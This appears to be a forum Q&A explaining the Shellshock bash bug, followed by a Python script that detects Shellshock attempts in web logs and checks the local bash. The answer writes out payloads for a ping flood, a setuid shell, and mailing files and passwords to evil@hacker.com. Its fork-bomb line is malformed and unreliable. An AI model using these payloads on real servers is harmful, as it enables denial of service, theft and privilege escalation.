Can we exploit the Shellshock bash bug?
I read some articles about the Shellshock Bash bug (CVE-2014-6271 reported Sep 24, 2014) and have a general idea of what the vulnerability is and how it could be exploited. To better understand the implications of the bug, what would be a simple and specific example of an attack vector / scenario that could exploit the bug?
With access to Shellshock bash, even from the POV of a web user, the options are endless. For example, here's a fork bomb:
() { :; }; ){ : & };:
Just put that in a user agent string on a browser, go to your web page, and instant DoS on your web server.
Or, somebody could use your server as an attack bot:
() { :; }; ping -s 1000000
Put that on several other servers and you're talking about real bandwidth.
Other attack vectors:
# theft of data
() { :; }; find ~ -print | mail -s "Your files" evil@hacker.com
() { :; }; cat ~/.secret/passwd | mail -s "This password file" evil@hacker.com
# setuid shell
() { :; }; cp /bin/bash /tmp/bash && chmod 4755 /tmp/bash
There are endless other possibilities: reverse shells, running servers on ports, auto-downloading some rootkit to go from web user to root user. It's a shell! It can do anything. As far as security disasters go, this is even worse than Heartbleed. The important part is that you patch your system. NOW! If you still have external-facing servers that are still unpatched, what are you doing still reading this?! Hackers are already doing these things above, and you don't even know it!
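A defender-side complement to the answer above, added here and not part of the original question or answer: a small Python script that flags Shellshock delivery attempts in web server access logs (the payloads arrive in headers such as User-Agent and Referer, which a CGI server hands to bash as environment variables) and runs the widely published local check for whether the installed bash still executes a function definition smuggled in through an environment variable. The log lines, IP addresses and the `SHELLSHOCK_PROBE` variable name are constructed for the example; the probe only echoes a marker.

```python
import os
import re
import subprocess

# Constructed sample lines in Apache/nginx "combined" log format. The two payload-bearing
# lines carry inert function-definition prefixes (echo / true), so the sample does nothing
# even if it were ever handed to a vulnerable shell.
LOG_SAMPLE = """\
203.0.113.7 - - [25/Sep/2014:10:15:32 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; echo vulnerable"
198.51.100.4 - - [25/Sep/2014:10:15:40 +0000] "GET /index.html HTTP/1.1" 200 2048 "http://example.com/" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.9 - - [25/Sep/2014:10:16:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 128 "() { :;}; /bin/true" "curl/7.38.0"
"""

# Combined log format: host ident user [time] "request" status bytes "referer" "user-agent"
_LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# A vulnerable bash only honours a value that starts with "() {", but scanners varied
# the whitespace, so match the function-definition shape loosely for detection.
_SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def find_shellshock(log_text):
    """Scan combined-format log lines and return (host, field, value) for every
    request field that looks like a bash function definition, i.e. a Shellshock
    delivery attempt against a CGI handler."""
    hits = []
    for line in log_text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for field in ("request", "referer", "agent"):
            value = m.group(field)
            if _SHELLSHOCK_RE.search(value):
                hits.append((m.group("host"), field, value))
    return hits


def bash_is_vulnerable(bash="bash"):
    """Return True if the local bash runs trailing commands from an environment
    variable (the published Shellshock check), False if it is patched, and None if
    bash cannot be executed here. The probe variable name is arbitrary."""
    env = dict(os.environ)
    env["SHELLSHOCK_PROBE"] = "() { :; }; echo SHELLSHOCK_MARKER"
    try:
        proc = subprocess.run([bash, "-c", "true"], env=env,
                              capture_output=True, text=True, timeout=10)
    except (OSError, subprocess.SubprocessError):
        return None
    # A patched bash treats SHELLSHOCK_PROBE as a plain variable and prints nothing.
    return "SHELLSHOCK_MARKER" in proc.stdout


if __name__ == "__main__":
    for host, field, value in find_shellshock(LOG_SAMPLE):
        print(f"{host}: shellshock pattern in {field}: {value!r}")
    print("local bash vulnerable:", bash_is_vulnerable())
```

Run against real logs by feeding the file contents to `find_shellshock`; any hit from an external address against a `/cgi-bin/` path is worth treating as a compromise attempt, and a `True` from `bash_is_vulnerable` on any host means the patch the answer insists on has not landed there.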